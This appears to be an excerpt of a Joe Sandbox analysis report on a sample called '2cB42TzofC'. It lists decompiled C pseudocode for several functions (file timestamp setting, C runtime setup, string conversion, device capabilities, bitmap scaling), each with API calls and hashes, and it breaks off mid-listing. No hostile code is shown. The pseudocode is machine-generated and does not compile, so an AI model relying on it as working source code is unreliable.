                                                        • API String ID: 1036877536-0
                                                        • Opcode ID: e530949d133c0fe719df7704e4bd8e68177ea7de6064a97516e7fd75facf1640
                                                        • Instruction ID: fcb46ebc7a15cc44da53522b2c6740a8999b24b6227e99f805eadc444bae3bc0
                                                        • Opcode Fuzzy Hash: e530949d133c0fe719df7704e4bd8e68177ea7de6064a97516e7fd75facf1640
                                                        • Instruction Fuzzy Hash: 03A16672A103A69FEB22CF2CE9917AFBBE5EF15750F24417DE8859B281D2388D41C750
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0A49E Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E00A0A49E(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E00A1E630();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E00A0A387( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E00A0A637( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00A10EAD(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00A10EAD(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00A10EAD(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E00A0A637( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E00A0B85C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}













                                                        0x00a0a49e
                                                        0x00a0a4a3
                                                        0x00a0a4af
                                                        0x00a0a4b6
                                                        0x00a0a4ba
                                                        0x00a0a4c7
                                                        0x00a0a4c7
                                                        0x00a0a4cb
                                                        0x00a0a4cb
                                                        0x00a0a4d4
                                                        0x00a0a4e1
                                                        0x00a0a4e1
                                                        0x00a0a4e5
                                                        0x00a0a4e5
                                                        0x00a0a4ee
                                                        0x00a0a4fc
                                                        0x00a0a4fc
                                                        0x00a0a500
                                                        0x00a0a507
                                                        0x00a0a50c
                                                        0x00a0a513
                                                        0x00a0a529
                                                        0x00a0a519
                                                        0x00a0a522
                                                        0x00a0a522
                                                        0x00a0a544
                                                        0x00a0a54a
                                                        0x00a0a551
                                                        0x00a0a59b
                                                        0x00a0a5a0
                                                        0x00a0a5a9
                                                        0x00a0a5a9
                                                        0x00a0a5b3
                                                        0x00a0a5bc
                                                        0x00a0a5bc
                                                        0x00a0a5c6
                                                        0x00a0a5cf
                                                        0x00a0a5cf
                                                        0x00a0a5df
                                                        0x00a0a5e3
                                                        0x00a0a5f3
                                                        0x00a0a603
                                                        0x00a0a609
                                                        0x00a0a610
                                                        0x00a0a618
                                                        0x00a0a625
                                                        0x00a0a625
                                                        0x00000000
                                                        0x00a0a553
                                                        0x00a0a564
                                                        0x00a0a56b
                                                        0x00a0a62a
                                                        0x00a0a634
                                                        0x00a0a634
                                                        0x00a0a588
                                                        0x00a0a58e
                                                        0x00a0a595
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a595
                                                        0x00a0a551
                                                        0x00a0a4f6
                                                        0x00a0a4fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a4fa
                                                        0x00a0a4db
                                                        0x00a0a4df
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a0a4df
                                                        0x00a0a4c1
                                                        0x00a0a4c5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00A0823A,?,?,?), ref: 00A0A544
                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000000,?,00A0823A,?), ref: 00A0A588
                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000000,?,00A0823A,?,?,?,?,?,?,?), ref: 00A0A609
                                                        • CloseHandle.KERNEL32(?,?,?,00000000,?,00A0823A,?,?,?,?,?,?,?,?,?,?), ref: 00A0A610
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: File$Create$CloseHandleTime
                                                        • String ID:
                                                        • API String ID: 2287278272-0
                                                        • Opcode ID: 9ac9bf9262e5fdca9177a59ba07a4e8ee629a20b284b1cbacc5ba4dd1144a872
                                                        • Instruction ID: c62c4feee8cc9afa85fe846ce02972234aa3538f3ac36bbb44a9cc42f3d2bab4
                                                        • Opcode Fuzzy Hash: 9ac9bf9262e5fdca9177a59ba07a4e8ee629a20b284b1cbacc5ba4dd1144a872
                                                        • Instruction Fuzzy Hash: 6D41E0312483859AE721DF24EC45FEEBBE8AFA5700F08091CF5D5931C0D6A5AA48DB53
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2C3F8 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 81%
                                                        			E00A2C3F8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xa3e668; // 0xcba178b4
				_v8 = _t34 ^ _t70;
				E00A240A6(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x8fe85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00A1EEFA(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00A1F5F0(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00A2A5D0(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00A28838(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00A31D00();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                                                        0x00a2c400
                                                        0x00a2c407
                                                        0x00a2c413
                                                        0x00a2c418
                                                        0x00a2c41d
                                                        0x00a2c422
                                                        0x00a2c422
                                                        0x00a2c425
                                                        0x00a2c427
                                                        0x00a2c427
                                                        0x00a2c42c
                                                        0x00a2c445
                                                        0x00a2c44b
                                                        0x00a2c450
                                                        0x00a2c4ef
                                                        0x00a2c4f3
                                                        0x00a2c4f8
                                                        0x00a2c4f8
                                                        0x00a2c514
                                                        0x00a2c514
                                                        0x00a2c456
                                                        0x00a2c45e
                                                        0x00a2c462
                                                        0x00a2c4ae
                                                        0x00a2c4b0
                                                        0x00a2c4b2
                                                        0x00a2c4b7
                                                        0x00a2c4ce
                                                        0x00a2c4d6
                                                        0x00a2c4e6
                                                        0x00a2c4e6
                                                        0x00a2c4d6
                                                        0x00a2c4e8
                                                        0x00a2c4e9
                                                        0x00000000
                                                        0x00a2c4ee
                                                        0x00a2c469
                                                        0x00a2c46b
                                                        0x00a2c46d
                                                        0x00a2c475
                                                        0x00a2c492
                                                        0x00a2c49c
                                                        0x00a2c4a1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2c4a3
                                                        0x00a2c4a9
                                                        0x00a2c4a9
                                                        0x00000000
                                                        0x00a2c4a9
                                                        0x00a2c479
                                                        0x00a2c47d
                                                        0x00a2c482
                                                        0x00a2c486
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2c488
                                                        0x00000000

                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,8FE85006,00A24236,00000000,00000000,00A2526B,?,00A2526B,?,00000001,00A24236,8FE85006,00000001,00A2526B,00A2526B), ref: 00A2C445
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A2C4CE
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A2C4E0
                                                        • __freea.LIBCMT ref: 00A2C4E9
                                                          • Part of subcall function 00A28838: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A23CF6,?,0000015D,?,?,?,?,00A251D2,000000FF,00000000,?,?), ref: 00A2886A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                        • String ID:
                                                        • API String ID: 2652629310-0
                                                        • Opcode ID: ee42cc3f3a40c291e8d9e44b3b6f98105ab4526a447370c254084577814f50d3
                                                        • Instruction ID: 9e79656de5933adc3cf064debb00a1fd72be1511baa506abcd75e5fff0004948
                                                        • Opcode Fuzzy Hash: ee42cc3f3a40c291e8d9e44b3b6f98105ab4526a447370c254084577814f50d3
                                                        • Instruction Fuzzy Hash: A9319E72A0022AABDF24EF68EC55DBF7BA5EF40720B054169FC04D6150EB35DD91CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A227A3 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 20%
                                                        			E00A227A3(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00A22DF2(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00A1FEAB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00A22FF4(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00A225AD(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00A1FE79(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












                                                        0x00a227a3
                                                        0x00a227a3
                                                        0x00a227a6
                                                        0x00a227ab
                                                        0x00a227ae
                                                        0x00a227b0
                                                        0x00a227b3
                                                        0x00a227b6
                                                        0x00a227b7
                                                        0x00a227ba
                                                        0x00a227bf
                                                        0x00a227bf
                                                        0x00a227c2
                                                        0x00a227c6
                                                        0x00a227c9
                                                        0x00a227ce
                                                        0x00a227cb
                                                        0x00a227cb
                                                        0x00a227cb
                                                        0x00a227d1
                                                        0x00a227d7
                                                        0x00a227da
                                                        0x00a227dc
                                                        0x00a227df
                                                        0x00a227e2
                                                        0x00a227e3
                                                        0x00a227ec
                                                        0x00a227f1
                                                        0x00a227f4
                                                        0x00a227fa
                                                        0x00a227fd
                                                        0x00a22800
                                                        0x00a22803
                                                        0x00a22804
                                                        0x00a22807
                                                        0x00a22812
                                                        0x00a22816
                                                        0x00000000
                                                        0x00a22816
                                                        0x00a2281d

                                                        APIs
                                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 00A227BA
                                                          • Part of subcall function 00A22DF2: ___AdjustPointer.LIBCMT ref: 00A22E3C
                                                        • _UnwindNestedFrames.LIBCMT ref: 00A227D1
                                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 00A227E3
                                                        • CallCatchBlock.LIBVCRUNTIME ref: 00A22807
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                        • String ID:
                                                        • API String ID: 2633735394-0
                                                        • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                        • Instruction ID: c3eb539053ce580998fd3444228808e3ba4f6e8bb5a33bb00458cb3f4e04f0ea
                                                        • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                        • Instruction Fuzzy Hash: 03012532000159BFCF12AF69DD41FDA3BBAFF98714F148124F91862121C376E8A1EBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1A01B Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A1A01B() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0xa48428 = GetDeviceCaps(_t5, 0x58);
					 *0xa4842c = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}





                                                        0x00a1a01e
                                                        0x00a1a024
                                                        0x00a1a028
                                                        0x00a1a036
                                                        0x00a1a044
                                                        0x00000000
                                                        0x00a1a049
                                                        0x00a1a050

                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00A1A01E
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A1A02D
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A1A03B
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00A1A049
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: f9afb66226cccb6c042a842a6bdf0e25f8f0433fbeeca59a0295a052324d0606
                                                        • Instruction ID: a24dc9ff5c9bb86dc2b45480d5bcbdacc05f1cc5205221a43f995ccfe31e23c6
                                                        • Opcode Fuzzy Hash: f9afb66226cccb6c042a842a6bdf0e25f8f0433fbeeca59a0295a052324d0606
                                                        • Instruction Fuzzy Hash: 5AE0EC39986A21A7D320DBE17C0DB8F3B74AB0AB62F060005FA05A61D0DAB44846CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A222B6 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A222B6() {
				void* _t4;
				void* _t8;

				E00A23704();
				E00A23698();
				if(E00A233BE() != 0) {
					_t4 = E00A223FC(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00A233FA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                                        0x00a222b6
                                                        0x00a222bb
                                                        0x00a222c7
                                                        0x00a222cc
                                                        0x00a222d1
                                                        0x00a222d3
                                                        0x00a222de
                                                        0x00a222d5
                                                        0x00a222d5
                                                        0x00000000
                                                        0x00a222d5
                                                        0x00a222c9
                                                        0x00a222c9
                                                        0x00a222cb
                                                        0x00a222cb

                                                        APIs
                                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00A222B6
                                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00A222BB
                                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00A222C0
                                                          • Part of subcall function 00A233BE: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00A233CF
                                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00A222D5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                        • String ID:
                                                        • API String ID: 1761009282-0
                                                        • Opcode ID: 5bd959aa501a7ab12ea48519a29bdec622f540cb30e6334150180b8a95b84f40
                                                        • Instruction ID: c82518b0b85830a25e54aeaf26a77be88ac23900bd33c72500119b4495b1cc13
                                                        • Opcode Fuzzy Hash: 5bd959aa501a7ab12ea48519a29bdec622f540cb30e6334150180b8a95b84f40
                                                        • Instruction Fuzzy Hash: 1EC00256104631B41C20BABD33063ED43515C9778478124B1E8422A5179D0E060A2B33
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1A1BD Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 241COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 22%
                                                        			E00A1A1BD(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				intOrPtr _v116;
				char _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				char _v140;
				intOrPtr* _v144;
				char _v156;
				intOrPtr* _v164;
				intOrPtr* _v168;
				intOrPtr _v176;
				char _v180;
				char _v184;
				intOrPtr* _v196;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr _v232;
				intOrPtr* _v236;
				intOrPtr* _v244;
				void* _v256;
				void* _v260;
				intOrPtr* _v268;
				void* __edi;
				intOrPtr* _t89;
				void* _t91;
				intOrPtr* _t92;
				signed int _t95;
				intOrPtr* _t98;
				intOrPtr* _t101;
				short _t111;
				signed int _t114;
				intOrPtr* _t115;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t127;
				signed int _t130;
				intOrPtr* _t136;
				intOrPtr* _t140;
				void* _t145;
				signed int _t147;
				intOrPtr* _t153;
				intOrPtr* _t167;
				intOrPtr* _t170;
				char _t181;
				void* _t183;
				intOrPtr* _t187;
				signed int _t199;
				long long* _t203;
				long long _t206;

				_t206 = __fp0;
				if(E00A1A051() != 0) {
					_t145 = _a4;
					GetObjectW(_t145, 0x18,  &_v68);
					_t147 = _v4;
					asm("cdq");
					_t199 = _v72 * _t147 / _v76;
					if(_t199 >= _v0) {
						_t199 = _v0;
					}
					if(_t147 != _v76 || _t199 != _v72) {
						_t181 = 0;
						_push( &_v124);
						_push(0xa34684);
						_push(1);
						_push(0);
						_push(0xa3546c);
						if( *0xa62178() >= 0) {
							_t89 = _v144;
							 *0xa33260(_t89, _t145, 0, 2,  &_v140, _t183);
							_t91 =  *((intOrPtr*)( *_t89 + 0x54))();
							_t92 = _v164;
							if(_t91 < 0) {
								L14:
								 *0xa33260(_t92);
								 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))();
								L21:
								_t95 =  *0xa620e8(_t145, _t181, _t181, _t181, _t181);
								L22:
								goto L23;
							}
							_v156 = 0;
							_t187 =  *((intOrPtr*)( *_t92 + 0x28));
							_t153 = _t187;
							 *0xa33260(_t92,  &_v156);
							if( *_t187() < 0) {
								L13:
								_t98 = _v168;
								 *0xa33260(_t98);
								 *((intOrPtr*)( *((intOrPtr*)( *_t98 + 8))))();
								_t92 = _v176;
								goto L14;
							}
							_t101 = _v164;
							asm("fldz");
							 *_t203 = _t206;
							 *0xa33260(_t101, _v168, 0xa3547c, 0, 0, _t153, _t153, 0);
							if( *((intOrPtr*)( *_t101 + 0x20))() >= 0) {
								E00A1F5F0(0,  &_v136, 0, 0x2c);
								_v132 = _v84;
								_v136 = 0x28;
								_v128 =  ~_t199;
								_v120 = 0;
								_v124 = 1;
								_t111 = 0x20;
								_v122 = _t111;
								_v184 = 0;
								_t114 =  *0xa6205c(0,  &_v136, 0,  &_v180, 0, 0);
								_v212 = _t114;
								asm("sbb ecx, ecx");
								if(( ~_t114 & 0x7ff8fff2) + 0x8007000e >= 0) {
									_t167 = _v228;
									 *0xa33260(_t167,  &_v216);
									 *((intOrPtr*)( *((intOrPtr*)( *_t167 + 0x2c))))();
									_t127 = _v224;
									 *0xa33260(_t127, _v232, _v116, _t199, 3);
									 *((intOrPtr*)( *_t127 + 0x20))();
									_t130 = _v136;
									_t170 = _v244;
									_v216 = _t199;
									_v220 = _t130;
									_v228 = 0;
									_v224 = 0;
									 *0xa33260(_t170,  &_v228, _t130 << 2, _t199 * _t130 << 2, _v232);
									if( *((intOrPtr*)( *_t170 + 0x1c))() < 0) {
										DeleteObject(_v260);
									} else {
										_v256 = _v260;
									}
									_t136 = _v268;
									 *0xa33260(_t136);
									 *((intOrPtr*)( *((intOrPtr*)( *_t136 + 8))))();
								}
								_t115 = _v224;
								 *0xa33260(_t115);
								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))();
								_t118 = _v224;
								 *0xa33260(_t118);
								 *((intOrPtr*)( *((intOrPtr*)( *_t118 + 8))))();
								_t121 = _v236;
								 *0xa33260(_t121);
								 *((intOrPtr*)( *((intOrPtr*)( *_t121 + 8))))();
								_t95 = _v220;
								if(_t95 != 0) {
									goto L22;
								} else {
									goto L21;
								}
							}
							_t140 = _v196;
							 *0xa33260(_t140);
							 *((intOrPtr*)( *((intOrPtr*)( *_t140 + 8))))();
							goto L13;
						}
						goto L8;
					} else {
						_t181 = 0;
						L8:
						_t95 =  *0xa620e8(_t145, _t181, _t181, _t181, _t181);
						L23:
						return _t95;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00A1A476();
			}































































                                                        0x00a1a1bd
                                                        0x00a1a1c7
                                                        0x00a1a1e0
                                                        0x00a1a1ed
                                                        0x00a1a1f7
                                                        0x00a1a201
                                                        0x00a1a206
                                                        0x00a1a20f
                                                        0x00a1a211
                                                        0x00a1a211
                                                        0x00a1a21d
                                                        0x00a1a22d
                                                        0x00a1a22f
                                                        0x00a1a230
                                                        0x00a1a238
                                                        0x00a1a239
                                                        0x00a1a23a
                                                        0x00a1a247
                                                        0x00a1a259
                                                        0x00a1a26d
                                                        0x00a1a273
                                                        0x00a1a278
                                                        0x00a1a27c
                                                        0x00a1a2f1
                                                        0x00a1a2f9
                                                        0x00a1a2ff
                                                        0x00a1a461
                                                        0x00a1a466
                                                        0x00a1a46c
                                                        0x00000000
                                                        0x00a1a46c
                                                        0x00a1a27e
                                                        0x00a1a28a
                                                        0x00a1a28d
                                                        0x00a1a28f
                                                        0x00a1a299
                                                        0x00a1a2d9
                                                        0x00a1a2d9
                                                        0x00a1a2e5
                                                        0x00a1a2eb
                                                        0x00a1a2ed
                                                        0x00000000
